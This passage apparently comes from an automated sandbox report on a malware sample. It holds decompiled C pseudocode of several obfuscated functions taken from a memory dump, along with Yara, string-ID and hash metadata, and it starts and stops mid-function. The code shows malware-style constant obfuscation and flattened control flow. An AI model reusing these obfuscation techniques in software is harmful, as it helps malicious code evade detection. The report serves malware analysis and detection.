				_v2628 = 0x2b2d03;
				_t496 = __ecx;
				_t497 = 0xe76a3a8;
				_t448 = 0x59;
				_v2628 = _v2628 / _t448;
				_v2628 = _v2628 ^ 0x000f0bd3;
				_v2780 = 0x555899;
				_v2780 = _v2780 ^ 0x1a2e1782;
				_v2780 = _v2780 >> 6;
				_t449 = 0x70;
				_v2780 = _v2780 * 0x1e;
				_v2780 = _v2780 ^ 0x0c60a122;
				_v2620 = 0x3757e0;
				_v2620 = _v2620 >> 0xf;
				_v2620 = _v2620 ^ 0x0002f966;
				_v2684 = 0xb11485;
				_v2684 = _v2684 >> 5;
				_v2684 = _v2684 << 2;
				_v2684 = _v2684 ^ 0x001d02ff;
				_v2728 = 0x41bcba;
				_v2728 = _v2728 / _t449;
				_v2728 = _v2728 | 0x0391f118;
				_v2728 = _v2728 ^ 0x0396fd83;
				_v2696 = 0xc1937c;
				_v2696 = _v2696 ^ 0x2234657c;
				_v2696 = _v2696 << 4;
				_v2696 = _v2696 ^ 0x2f5aa2df;
				_v2748 = 0x9680ae;
				_v2748 = _v2748 ^ 0xdbb0bcef;
				_v2748 = _v2748 + 0x5e53;
				_v2748 = _v2748 + 0x5e6f;
				_v2748 = _v2748 ^ 0xdb27b888;
				_v2704 = 0xc50fbb;
				_v2704 = _v2704 ^ 0x111a2fa3;
				_t450 = 0x2e;
				_v2704 = _v2704 / _t450;
				_v2704 = _v2704 ^ 0x0069a71a;
				_v2668 = 0xe40b9e;
				_v2668 = _v2668 ^ 0xdc1f8f20;
				_v2668 = _v2668 ^ 0xdcfe6789;
				_v2612 = 0xe14343;
				_v2612 = _v2612 << 0xf;
				_v2612 = _v2612 ^ 0xa1ab00ea;
				_v2772 = 0xbe2c30;
				_v2772 = _v2772 + 0xf5f8;
				_t451 = 0x19;
				_v2772 = _v2772 / _t451;
				_v2772 = _v2772 << 4;
				_v2772 = _v2772 ^ 0x007712b1;
				_v2720 = 0x61965;
				_t445 = 0x4d;
				_v2720 = _v2720 / _t445;
				_v2720 = _v2720 >> 7;
				_v2720 = _v2720 ^ 0x000aecf1;
				_v2604 = 0xad6ca1;
				_t452 = 0x1c;
				_v2604 = _v2604 / _t452;
				_v2604 = _v2604 ^ 0x000c2534;
				_v2756 = 0x44e9a5;
				_v2756 = _v2756 + 0xffff5377;
				_v2756 = _v2756 | 0x69391a2d;
				_v2756 = _v2756 >> 0xd;
				_v2756 = _v2756 ^ 0x0000d2ac;
				_v2652 = 0xe29325;
				_v2652 = _v2652 | 0x9951b1c8;
				_v2652 = _v2652 ^ 0x99fb4cd5;
				_v2680 = 0x106b4b;
				_v2680 = _v2680 >> 0xc;
				_v2680 = _v2680 ^ 0x0008378d;
				_v2660 = 0xce2cee;
				_v2660 = _v2660 ^ 0xabd025b6;
				_v2660 = _v2660 ^ 0xab117388;
				_v2636 = 0xe72c5a;
				_v2636 = _v2636 << 1;
				_v2636 = _v2636 ^ 0x01cfd1bd;
				_v2764 = 0xce9bac;
				_v2764 = _v2764 >> 0xd;
				_v2764 = _v2764 << 0xf;
				_v2764 = _v2764 ^ 0x6cd849b1;
				_v2764 = _v2764 ^ 0x6fe47cdc;
				_v2608 = 0xdab50e;
				_t453 = 0x6c;
				_v2608 = _v2608 * 0x58;
				_v2608 = _v2608 ^ 0x4b21ebc8;
				_v2644 = 0x21e7e8;
				_v2644 = _v2644 >> 6;
				_v2644 = _v2644 ^ 0x0003a4ec;
				_v2712 = 0xe3911c;
				_v2712 = _v2712 / _t445;
				_v2712 = _v2712 * 0x43;
				_v2712 = _v2712 ^ 0x00cdd074;
				_v2688 = 0xdd1a93;
				_v2688 = _v2688 ^ 0x7985c00e;
				_v2688 = _v2688 << 3;
				_v2688 = _v2688 ^ 0xcac8c97c;
				_v2616 = 0x5faab1;
				_v2616 = _v2616 ^ 0x1b6fd98f;
				_v2616 = _v2616 ^ 0x1b3ded53;
				_v2724 = 0x954f7;
				_v2724 = _v2724 / _t453;
				_v2724 = _v2724 ^ 0x5ad7c010;
				_v2724 = _v2724 ^ 0x5ad74941;
				_v2672 = 0xf78f3b;
				_v2672 = _v2672 << 9;
				_v2672 = _v2672 ^ 0xef18aa44;
				_v2732 = 0x9cb3b1;
				_v2732 = _v2732 >> 4;
				_v2732 = _v2732 ^ 0xe2d83eaa;
				_v2732 = _v2732 ^ 0xe2ddc922;
				_v2676 = 0x4f63c;
				_v2676 = _v2676 | 0x7938451b;
				_v2676 = _v2676 ^ 0x7932d1fc;
				_v2784 = 0x227d8e;
				_v2784 = _v2784 * 0x70;
				_v2784 = _v2784 + 0x10ae;
				_v2784 = _v2784 + 0xffff0036;
				_v2784 = _v2784 ^ 0x0f16d66c;
				_v2656 = 0x8f5d03;
				_v2656 = _v2656 + 0xffffcb10;
				_v2656 = _v2656 ^ 0x008c40fc;
				_v2664 = 0x147a35;
				_v2664 = _v2664 + 0x72cc;
				_v2664 = _v2664 ^ 0x0013eff9;
				_v2708 = 0x3f889f;
				_v2708 = _v2708 + 0xffffe0c7;
				_v2708 = _v2708 << 4;
				_v2708 = _v2708 ^ 0x03f50c5f;
				_v2776 = 0x4b8e23;
				_v2776 = _v2776 | 0x95de3289;
				_v2776 = _v2776 + 0xffffaca1;
				_v2776 = _v2776 >> 0xa;
				_v2776 = _v2776 ^ 0x0024a504;
				_v2716 = 0xa59736;
				_v2716 = _v2716 + 0xff6b;
				_v2716 = _v2716 | 0x7b3af132;
				_v2716 = _v2716 ^ 0x7bbb5486;
				_v2640 = 0x9c4b93;
				_v2640 = _v2640 + 0xffff33f3;
				_v2640 = _v2640 ^ 0x0090f653;
				_v2648 = 0xf61d93;
				_v2648 = _v2648 | 0x4192b52a;
				_v2648 = _v2648 ^ 0x41f40c5d;
				_v2632 = 0xed7875;
				_v2632 = _v2632 >> 9;
				_v2632 = _v2632 ^ 0x000d0692;
				_v2692 = 0x914f94;
				_v2692 = _v2692 ^ 0xe0988b56;
				_v2692 = _v2692 << 3;
				_v2692 = _v2692 ^ 0x004aa312;
				_v2768 = 0x3b95d3;
				_v2768 = _v2768 >> 0xe;
				_v2768 = _v2768 >> 8;
				_v2768 = _v2768 | 0x90778fa3;
				_v2768 = _v2768 ^ 0x907ffb5b;
				_v2700 = 0x78c939;
				_t454 = 0x4f;
				_v2700 = _v2700 / _t454;
				_v2700 = _v2700 * 0x43;
				_v2700 = _v2700 ^ 0x00613dde;
				_v2744 = 0xacd4ca;
				_v2744 = _v2744 * 0x60;
				_v2744 = _v2744 ^ 0x1bb6e038;
				_v2744 = _v2744 | 0x0be4115d;
				_v2744 = _v2744 ^ 0x5bf4c74e;
				_v2624 = 0xe52846;
				_v2624 = _v2624 | 0x37888519;
				_v2624 = _v2624 ^ 0x37e7174c;
				_v2752 = 0xa93f91;
				_v2752 = _v2752 * 0x6b;
				_v2752 = _v2752 * 0x7b;
				_v2752 = _v2752 ^ 0x7befb542;
				_v2752 = _v2752 ^ 0x86fdbe14;
				_v2740 = 0x2ae576;
				_v2740 = _v2740 + 0xbc14;
				_v2740 = _v2740 + 0xffff6f1a;
				_v2740 = _v2740 ^ 0x002d5a1a;
				_v2760 = 0x7dbeee;
				_v2760 = _v2760 << 0xa;
				_v2760 = _v2760 >> 7;
				_t425 = _v2760 * 0x13;
				_v2760 = _t425;
				_v2760 = _v2760 ^ 0x24a154d6;
				do {
					while(_t497 != 0x13254dd) {
						if(_t497 == 0xe76a3a8) {
							_t497 = 0x13254dd;
							continue;
						} else {
							_t509 = _t497 - 0xf9d6351;
							if(_t497 == 0xf9d6351) {
								E0121B3B4(_v2724, _t454, _v2672, _t454, _v2732,  &_v1040, _v2676, _v2736);
								_push(_v2664);
								_push(_v2656);
								E01222EA5( &_v2080, _t509,  &_v1040, 0x12114d4, _v2776, _v2716, E0122CD35(0x12114d4, _v2784, _t509), _v2640, _v2648,  &_v520);
								E0122629F(_v2632, _t438, _v2692, _v2768, _v2700);
								return E0122EA55( &_v520, _v2744, 0, _v2624, 0, _v2752, 0, _v2740, _v2760, 0);
							}
							goto L9;
						}
						L5:
						return _t425;
					}
					E0122855C( &_v2600, _v2628, __eflags, _v2780, _v2620, _t454, _v2684);
					 *((short*)(E01212B69(_v2728, _v2696,  &_v2600, _v2748))) = 0;
					E01213432( &_v1560, _v2704, __eflags, _v2668);
					_push(_v2720);
					_push(_v2772);
					E01222EA5( &_v1560, __eflags,  &_v2600, 0x1211404, _v2756, _v2652, E0122CD35(0x1211404, _v2612, __eflags), _v2680, _v2660,  &_v2080);
					E0122629F(_v2636, _t430, _v2764, _v2608, _v2644);
					_t454 = _t496;
					_t425 = E0122E5A7(_t496, _v2712, _v2688,  &_v2080, _v2616);
					_t501 =  &(_t501[0x17]);
					__eflags = _t425;
					if(_t425 != 0) {
						_t497 = 0xf9d6351;
						goto L9;
					}
					goto L5;
					L9:
					__eflags = _t497 - 0x7fda310;
				} while (__eflags != 0);
				return _t425;
			}

































































                          0x01216869
                          0x0121686f
                          0x01216879
                          0x0121687e
                          0x01216883
                          0x0121688b
                          0x012168a3
                          0x012168a5
                          0x012168aa
                          0x012168af
                          0x012168b8
                          0x012168c3
                          0x012168cb
                          0x012168d3
                          0x012168dd
                          0x012168e0
                          0x012168e4
                          0x012168ec
                          0x012168f7
                          0x012168ff
                          0x0121690a
                          0x01216912
                          0x01216917
                          0x0121691c
                          0x01216924
                          0x01216934
                          0x01216938
                          0x01216940
                          0x01216948
                          0x01216950
                          0x01216958
                          0x0121695d
                          0x01216965
                          0x0121696d
                          0x01216975
                          0x0121697d
                          0x01216985
                          0x0121698d
                          0x01216995
                          0x012169a1
                          0x012169a6
                          0x012169ac
                          0x012169b4
                          0x012169bf
                          0x012169ca
                          0x012169d5
                          0x012169e0
                          0x012169e8
                          0x012169f3
                          0x012169fb
                          0x01216a07
                          0x01216a0c
                          0x01216a12
                          0x01216a17
                          0x01216a1f
                          0x01216a2b
                          0x01216a2e
                          0x01216a32
                          0x01216a39
                          0x01216a41
                          0x01216a55
                          0x01216a5a
                          0x01216a61
                          0x01216a6c
                          0x01216a74
                          0x01216a7c
                          0x01216a84
                          0x01216a89
                          0x01216a91
                          0x01216a9c
                          0x01216aa7
                          0x01216ab2
                          0x01216aba
                          0x01216abf
                          0x01216ac7
                          0x01216ad2
                          0x01216add
                          0x01216ae8
                          0x01216af3
                          0x01216afa
                          0x01216b05
                          0x01216b0d
                          0x01216b12
                          0x01216b17
                          0x01216b1f
                          0x01216b27
                          0x01216b3c
                          0x01216b3d
                          0x01216b44
                          0x01216b4f
                          0x01216b5a
                          0x01216b62
                          0x01216b6d
                          0x01216b7d
                          0x01216b86
                          0x01216b8a
                          0x01216b92
                          0x01216b9a
                          0x01216ba2
                          0x01216ba7
                          0x01216baf
                          0x01216bba
                          0x01216bc5
                          0x01216bd0
                          0x01216bde
                          0x01216be2
                          0x01216bea
                          0x01216bf2
                          0x01216bfd
                          0x01216c05
                          0x01216c10
                          0x01216c18
                          0x01216c1d
                          0x01216c25
                          0x01216c2d
                          0x01216c35
                          0x01216c3d
                          0x01216c45
                          0x01216c52
                          0x01216c56
                          0x01216c5e
                          0x01216c66
                          0x01216c6e
                          0x01216c79
                          0x01216c84
                          0x01216c91
                          0x01216ca1
                          0x01216cb1
                          0x01216cbc
                          0x01216cc4
                          0x01216ccc
                          0x01216cd1
                          0x01216cd9
                          0x01216ce1
                          0x01216ce9
                          0x01216cf1
                          0x01216cf6
                          0x01216cfe
                          0x01216d06
                          0x01216d0e
                          0x01216d16
                          0x01216d1e
                          0x01216d29
                          0x01216d34
                          0x01216d3f
                          0x01216d4a
                          0x01216d55
                          0x01216d60
                          0x01216d6b
                          0x01216d73
                          0x01216d7e
                          0x01216d86
                          0x01216d8e
                          0x01216d93
                          0x01216d9b
                          0x01216da3
                          0x01216da8
                          0x01216dad
                          0x01216db5
                          0x01216dbd
                          0x01216dcb
                          0x01216dce
                          0x01216dd7
                          0x01216ddb
                          0x01216de3
                          0x01216df0
                          0x01216df4
                          0x01216dfc
                          0x01216e04
                          0x01216e0c
                          0x01216e17
                          0x01216e22
                          0x01216e2d
                          0x01216e3a
                          0x01216e43
                          0x01216e47
                          0x01216e4f
                          0x01216e57
                          0x01216e5f
                          0x01216e67
                          0x01216e6f
                          0x01216e77
                          0x01216e7f
                          0x01216e84
                          0x01216e89
                          0x01216e8e
                          0x01216e92
                          0x01216e9a
                          0x01216e9a
                          0x01216ea8
                          0x01216f91
                          0x00000000
                          0x01216eae
                          0x01216eae
                          0x01216eb0
                          0x01216eda
                          0x01216edf
                          0x01216eeb
                          0x01216f33
                          0x01216f53
                          0x00000000
                          0x01216f83
                          0x00000000
                          0x01216eb0
                          0x01216f90
                          0x01216f90
                          0x01216f90
                          0x01216fb6
                          0x01216fe1
                          0x01216feb
                          0x01216ff0
                          0x01216ff9
                          0x01217047
                          0x01217067
                          0x0121707a
                          0x0121708b
                          0x01217090
                          0x01217093
                          0x01217095
                          0x0121709b
                          0x00000000
                          0x0121709b
                          0x00000000
                          0x0121709d
                          0x0121709d
                          0x0121709d
                          0x00000000

                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.693163248.0000000001210000.00000040.00000010.sdmp, Offset: 01210000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 6$CC$F($Z,$o^$ux$v*$|e4"$W7$!
                          • API String ID: 0-404381705
                          • Opcode ID: 1a7d90427b968b5ae7c82729fb65bb3df4715e381d49d9a7fd7951c43b17e080
                          • Instruction ID: d64a35d9470c926aeac59015e92baec36439124b029ed34b2af5ebe52a199ef1
                          • Opcode Fuzzy Hash: 1a7d90427b968b5ae7c82729fb65bb3df4715e381d49d9a7fd7951c43b17e080
                          • Instruction Fuzzy Hash: DC12FF715083809FD369CF21C48AA9FFBE1BBD4348F108A1DE6DA96260D7B58948CF43
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01217795, Relevance: 12.7, Strings: 10, Instructions: 225COMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 96%
                          			E01217795() {
				signed int _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				void* _t240;
				void* _t247;
				signed int _t248;
				intOrPtr* _t250;
				signed int _t251;
				signed int _t252;
				signed int _t253;
				signed int _t254;
				void* _t255;
				void* _t275;
				signed int* _t279;

				_t279 =  &_v112;
				_v12 = 0x3769c;
				_v4 = 0;
				_v8 = 0x151e38;
				_v56 = 0x3d41f1;
				_v56 = _v56 + 0xffffd857;
				_v16 = 0;
				_t275 = 0x33815b;
				_t251 = 0x1d;
				_push("true");
				_v56 = _v56 / _t251;
				_v56 = _v56 ^ 0x80021b62;
				_v92 = 0xdcca16;
				_v92 = _v92 | 0x76de14f0;
				_v92 = _v92 + 0xffff8ede;
				_v92 = _v92 << 7;
				_v92 = _v92 ^ 0x6f36ea02;
				_v32 = 0x77758c;
				_v32 = _v32 | 0xc8e26dc8;
				_v32 = _v32 ^ 0xc8fd8a5b;
				_v36 = 0xb0485;
				_v36 = _v36 << 0xe;
				_v36 = _v36 ^ 0xc127eeb7;
				_v104 = 0xcd60c4;
				_v104 = _v104 << 8;
				_pop(_t252);
				_v104 = _v104 * 0x33;
				_v104 = _v104 << 4;
				_v104 = _v104 ^ 0xa47e43fe;
				_v24 = 0xebb6b2;
				_v24 = _v24 * 0x56;
				_v24 = _v24 ^ 0x4f28e1eb;
				_v96 = 0x7a5126;
				_v96 = _v96 << 6;
				_v96 = _v96 | 0x630628b7;
				_v96 = _v96 + 0x3636;
				_v96 = _v96 ^ 0x7f9f3bbe;
				_v100 = 0x880cf0;
				_v100 = _v100 + 0xffff137b;
				_v100 = _v100 << 6;
				_v100 = _v100 ^ 0x1cd5e106;
				_v100 = _v100 ^ 0x3d16cee0;
				_v60 = 0x1c038;
				_v60 = _v60 + 0x5e48;
				_v60 = _v60 + 0xffffa27b;
				_v60 = _v60 ^ 0x0000fead;
				_v28 = 0x7c413c;
				_v28 = _v28 + 0xffffdb9e;
				_v28 = _v28 ^ 0x0073b996;
				_v64 = 0x7141bf;
				_v64 = _v64 + 0xffff8145;
				_v64 = _v64 / _t252;
				_v64 = _v64 ^ 0x00081e28;
				_v52 = 0x81ec0d;
				_v52 = _v52 >> 1;
				_v52 = _v52 + 0xffffcd38;
				_v52 = _v52 ^ 0x004a5346;
				_v80 = 0xb145f4;
				_t253 = 0x3d;
				_v80 = _v80 / _t253;
				_v80 = _v80 + 0x829b;
				_v80 = _v80 * 0x57;
				_v80 = _v80 ^ 0x012858b7;
				_v84 = 0xd3764b;
				_v84 = _v84 << 8;
				_v84 = _v84 + 0x6fa3;
				_v84 = _v84 << 8;
				_v84 = _v84 ^ 0x76b49c4d;
				_v88 = 0x5d3077;
				_v88 = _v88 + 0x766;
				_v88 = _v88 + 0xffffc987;
				_v88 = _v88 + 0x6eb6;
				_v88 = _v88 ^ 0x005317af;
				_v40 = 0x975c43;
				_t254 = 0x63;
				_t248 = _v16;
				_v40 = _v40 * 0xe;
				_v40 = _v40 ^ 0x0848c60e;
				_v44 = 0x6008c2;
				_v44 = _v44 | 0x3bc5621d;
				_v44 = _v44 ^ 0x3bef26a9;
				_v108 = 0xd2d0da;
				_v108 = _v108 * 0x35;
				_v108 = _v108 + 0xffffff06;
				_v108 = _v108 * 0x13;
				_v108 = _v108 ^ 0x3d4167ed;
				_v112 = 0x257da6;
				_v112 = _v112 + 0x40eb;
				_v112 = _v112 + 0xffff725c;
				_v112 = _v112 / _t254;
				_v112 = _v112 ^ 0x000ff7fb;
				_v68 = 0x6a5fab;
				_v68 = _v68 | 0x92dad95d;
				_v68 = _v68 ^ 0x03dbdb0d;
				_v68 = _v68 >> 6;
				_v68 = _v68 ^ 0x024a0fe3;
				_v72 = 0x2e74b0;
				_v72 = _v72 + 0x3ddf;
				_v72 = _v72 ^ 0x9da7b5bd;
				_v72 = _v72 << 0xa;
				_v72 = _v72 ^ 0x241b801f;
				_v76 = 0x735c6b;
				_v76 = _v76 ^ 0x38220f0e;
				_v76 = _v76 << 7;
				_v76 = _v76 | 0xb98203c4;
				_v76 = _v76 ^ 0xb9ab522c;
				_v48 = 0x3024d6;
				_v48 = _v48 + 0xfffff436;
				_v48 = _v48 >> 1;
				_v48 = _v48 ^ 0x0017b6fb;
				while(1) {
					L1:
					_t255 = 0x5c;
					while(1) {
						_t240 = 0xde0911a;
						do {
							L3:
							if(_t275 == 0x33815b) {
								_t275 = 0xb9bce4;
								goto L15;
							} else {
								if(_t275 == 0xb9bce4) {
									_t250 =  *0x1235218 + 0x234;
									while(1) {
										__eflags =  *_t250 - _t255;
										if(__eflags == 0) {
											break;
										}
										_t250 = _t250 + 2;
										__eflags = _t250;
									}
									_t248 = _t250 + 2;
									_t275 = 0x367b54d;
									_t240 = 0xde0911a;
									continue;
								} else {
									if(_t275 == 0x367b54d) {
										_push(_v104);
										_push(_v36);
										__eflags = E0121975A(0x12110a0,  &_v20, _v92, _v24, _v56, _v96, _v100, _v60, _v28, _v64, 0x12110a0, 0x12110a0, E0122CD35(0x12110a0, _v32, __eflags));
										_t275 =  ==  ? 0xde0911a : 0xd16896e;
										E0122629F(_v52, _t241, _v80, _v84, _v88);
										_t279 =  &(_t279[0x10]);
										_t240 = 0xde0911a;
										_t255 = 0x5c;
										goto L15;
									} else {
										if(_t275 == 0x99837b9) {
											E01219FE4(_v20, _v68, _v72, _v76, _v48);
										} else {
											if(_t275 != _t240) {
												goto L15;
											} else {
												_t247 = E0121ED15(_v20, _v40, _v44, _t248, _v108, _v112);
												_t279 =  &(_t279[4]);
												_t275 = 0x99837b9;
												_v16 = 0 | _t247 == 0x00000000;
												goto L1;
											}
										}
									}
								}
							}
							L18:
							return _v16;
							L15:
							__eflags = _t275 - 0xd16896e;
						} while (__eflags != 0);
						goto L18;
					}
				}
			}










































                          0x01217795
                          0x01217798
                          0x012177a2
                          0x012177a8
                          0x012177b0
                          0x012177b8
                          0x012177c4
                          0x012177c8
                          0x012177d3
                          0x012177d6
                          0x012177d8
                          0x012177de
                          0x012177e6
                          0x012177ee
                          0x012177f6
                          0x012177fe
                          0x01217803
                          0x0121780b
                          0x01217813
                          0x0121781b
                          0x01217823
                          0x0121782b
                          0x01217830
                          0x01217838
                          0x01217840
                          0x0121784a
                          0x0121784d
                          0x01217851
                          0x01217856
                          0x0121785e
                          0x0121786b
                          0x0121786f
                          0x01217877
                          0x0121787f
                          0x01217884
                          0x0121788c
                          0x01217894
                          0x0121789c
                          0x012178a4
                          0x012178ac
                          0x012178b1
                          0x012178b9
                          0x012178c1
                          0x012178c9
                          0x012178d1
                          0x012178d9
                          0x012178e1
                          0x012178e9
                          0x012178f1
                          0x012178f9
                          0x01217901
                          0x01217911
                          0x01217915
                          0x0121791d
                          0x01217925
                          0x01217929
                          0x01217931
                          0x01217939
                          0x01217945
                          0x01217948
                          0x0121794c
                          0x01217959
                          0x0121795d
                          0x01217965
                          0x0121796f
                          0x01217979
                          0x01217981
                          0x01217986
                          0x0121798e
                          0x01217996
                          0x0121799e
                          0x012179a6
                          0x012179ae
                          0x012179b6
                          0x012179c5
                          0x012179c6
                          0x012179ca
                          0x012179ce
                          0x012179d6
                          0x012179de
                          0x012179e6
                          0x012179ee
                          0x012179fb
                          0x012179ff
                          0x01217a0c
                          0x01217a10
                          0x01217a18
                          0x01217a20
                          0x01217a28
                          0x01217a36
                          0x01217a3a
                          0x01217a42
                          0x01217a4a
                          0x01217a52
                          0x01217a5a
                          0x01217a5f
                          0x01217a67
                          0x01217a6f
                          0x01217a77
                          0x01217a7f
                          0x01217a84
                          0x01217a8c
                          0x01217a94
                          0x01217a9c
                          0x01217aa1
                          0x01217aa9
                          0x01217ab1
                          0x01217ab9
                          0x01217ac1
                          0x01217ac5
                          0x01217acd
                          0x01217acd
                          0x01217acf
                          0x01217ad0
                          0x01217ad0
                          0x01217ad5
                          0x01217ad5
                          0x01217adb
                          0x01217bd4
                          0x00000000
                          0x01217ae1
                          0x01217ae3
                          0x01217bb7
                          0x01217bc2
                          0x01217bc2
                          0x01217bc5
                          0x00000000
                          0x00000000
                          0x01217bbf
                          0x01217bbf
                          0x01217bbf
                          0x01217bc7
                          0x01217bca
                          0x01217ad0
                          0x00000000
                          0x01217ae9
                          0x01217aef
                          0x01217b34
                          0x01217b3d
                          0x01217b7f
                          0x01217b9c
                          0x01217b9f
                          0x01217ba4
                          0x01217ba7
                          0x01217bae
                          0x00000000
                          0x01217af1
                          0x01217af7
                          0x01217bf8
                          0x01217afd
                          0x01217aff
                          0x00000000
                          0x01217b05
                          0x01217b1a
                          0x01217b21
                          0x01217b26
                          0x01217b2e
                          0x00000000
                          0x01217b2e
                          0x01217aff
                          0x01217af7
                          0x01217aef
                          0x01217ae3
                          0x01217c00
                          0x01217c0b
                          0x01217bd6
                          0x01217bd6
                          0x01217bd6
                          0x00000000
                          0x01217be2
                          0x01217ad0

                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.693163248.0000000001210000.00000040.00000010.sdmp, Offset: 01210000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: &Qz$66$<A|$FSJ$H^$k\s$w0]$@$gA=$(O
                          • API String ID: 0-3837304947
                          • Opcode ID: af70ae0ca24accbfbe48f7e2810be1b61107a3e11e0bad3628ca01496ab6a6e8
                          • Instruction ID: 0e5d8d9af8ff33d1cb8cc53d321f781cb483e59291492d68c8f2d9734c1d63a1
                          • Opcode Fuzzy Hash: af70ae0ca24accbfbe48f7e2810be1b61107a3e11e0bad3628ca01496ab6a6e8
                          • Instruction Fuzzy Hash: 22B12E725093819FC394CF29C98A80FBBF1BBD4758F504A1DF295962A0E3B58A49CF43
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0123261E, Relevance: 12.7, Strings: 10, Instructions: 201COMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 96%
                          			E0123261E(void* __ecx, void* __edx) {
				signed int _v4;
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _t199;
				signed int _t201;
				signed int _t203;
				void* _t206;
				signed int _t208;
				signed int _t209;
				void* _t224;
				void* _t225;
				signed int* _t228;

				_t228 =  &_v96;
				_v8 = _v8 & 0x00000000;
				_v4 = _v4 & 0x00000000;
				_v16 = 0x13f6e3;
				_v12 = 0xf1f80a;
				_v44 = 0xfb1edb;
				_t224 = __edx;
				_t206 = __ecx;
				_t225 = 0x4fb10bf;
				_t208 = 0x7d;
				_v44 = _v44 / _t208;
				_v44 = _v44 ^ 0x00020bb5;
				_v68 = 0x95b457;
				_v68 = _v68 + 0xffff80a6;
				_v68 = _v68 + 0xf3cf;
				_v68 = _v68 ^ 0x0097bbfe;
				_v64 = 0xfe40e7;
				_t209 = 0x7b;
				_v64 = _v64 * 0x2e;
				_v64 = _v64 * 0x4e;
				_v64 = _v64 ^ 0xeb83aa68;
				_v96 = 0xadf696;
				_v96 = _v96 * 3;
				_v96 = _v96 >> 0xa;
				_v96 = _v96 * 0x74;
				_v96 = _v96 ^ 0x003a584e;
				_v32 = 0xe93227;
				_v32 = _v32 + 0x6b73;
				_v32 = _v32 ^ 0x00e805b4;
				_v36 = 0x3c30e7;
				_v36 = _v36 | 0xdee0074a;
				_v36 = _v36 ^ 0xdefaf98e;
				_v40 = 0x1efef8;
				_v40 = _v40 | 0xdf1c2796;
				_v40 = _v40 ^ 0xdf1ee469;
				_v92 = 0xd2dd9e;
				_v92 = _v92 >> 9;
				_t57 =  &_v92; // 0x9
				_v92 =  *_t57 * 0x76;
				_v92 = _v92 | 0xc83581eb;
				_v92 = _v92 ^ 0xc8391980;
				_v56 = 0x4a018f;
				_v56 = _v56 + 0xffffa7db;
				_v56 = _v56 | 0x832de762;
				_v56 = _v56 ^ 0x83627da2;
				_v28 = 0x6201a0;
				_v28 = _v28 / _t209;
				_v28 = _v28 ^ 0x00045532;
				_v60 = 0x64cc7b;
				_v60 = _v60 * 0x6a;
				_v60 = _v60 << 0xf;
				_v60 = _v60 ^ 0x557fa729;
				_v76 = 0x39ae4b;
				_v76 = _v76 ^ 0xc1a4e08e;
				_v76 = _v76 << 0xe;
				_v76 = _v76 + 0x737c;
				_v76 = _v76 ^ 0x53b3b245;
				_v80 = 0x43b44d;
				_v80 = _v80 + 0xffffd108;
				_v80 = _v80 ^ 0xb3a85a57;
				_v80 = _v80 * 0x16;
				_v80 = _v80 ^ 0x76466d58;
				_v52 = 0x43a350;
				_v52 = _v52 + 0xb5e1;
				_v52 = _v52 + 0x6429;
				_v52 = _v52 ^ 0x004d0aff;
				_v84 = 0x69869a;
				_t210 = 0x63;
				_v84 = _v84 * 0x13;
				_v84 = _v84 + 0xda19;
				_v84 = _v84 ^ 0x1d311734;
				_v84 = _v84 ^ 0x1aea7160;
				_v88 = 0x1d035e;
				_v88 = _v88 << 0xc;
				_v88 = _v88 * 0x51;
				_v88 = _v88 + 0xffff4d79;
				_v88 = _v88 ^ 0xe1072623;
				_v48 = 0xaf1ee2;
				_v48 = _v48 >> 4;
				_v48 = _v48 >> 0xa;
				_v48 = _v48 ^ 0x0006a00c;
				_v72 = 0x859658;
				_v72 = _v72 | 0xc5b36f1e;
				_v72 = _v72 * 0x73;
				_v72 = _v72 << 0xd;
				_v72 = _v72 ^ 0xf6e599a4;
				_v20 = 0x9d3fd6;
				_t199 = _v20;
				_t221 = _t199 % _t210;
				_v20 = _t199 / _t210;
				_v20 = _v20 ^ 0x0000c172;
				_v24 = 0x563333;
				_v24 = _v24 | 0xbe94e07b;
				_v24 = _v24 ^ 0xbedae89d;
				while(1) {
					L1:
					_t201 = 0x273cd46;
					do {
						L2:
						while(_t225 != 0x1acfa64) {
							if(_t225 == _t201) {
								_t201 = E0121AD82(_v76, _t221, _v80, _t224, _v76, _v76, _v52, _v84, _t210, _v88, E0122E3B5);
								_t228 =  &(_t228[9]);
								 *(_t224 + 0x34) = _t201;
								__eflags = _t201;
								if(__eflags == 0) {
									_t225 = 0x1acfa64;
									goto L1;
								}
							} else {
								if(_t225 == 0x42103da) {
									_t221 = _v56;
									_t210 =  *(_t224 + 0x20);
									_t203 = E012236D5( *(_t224 + 0x20), _v56, _v28, _v60);
									_t228 =  &(_t228[2]);
									 *(_t224 + 0x28) = _t203;
									__eflags = _t203;
									_t201 = 0x273cd46;
									_t225 =  !=  ? 0x273cd46 : 0x1acfa64;
									continue;
								} else {
									if(_t225 == 0x4a0fd12) {
										_push(_v68);
										_t201 = E012140E2(_v44, _t206, __eflags, _t210);
										 *(_t224 + 0x20) = _t201;
										__eflags = _t201;
										if(_t201 != 0) {
											E0121C9A9(_v64, _t201, _t201, _v96);
											_push( *(_t224 + 0x20));
											_push(_v92);
											_push(_v40);
											_t221 = _v36;
											_t210 = _v32;
											E012262F5(_v32, _v36);
											_t228 =  &(_t228[5]);
											_t225 = 0x42103da;
											while(1) {
												L1:
												_t201 = 0x273cd46;
												goto L2;
											}
										}
									} else {
										if(_t225 != 0x4fb10bf) {
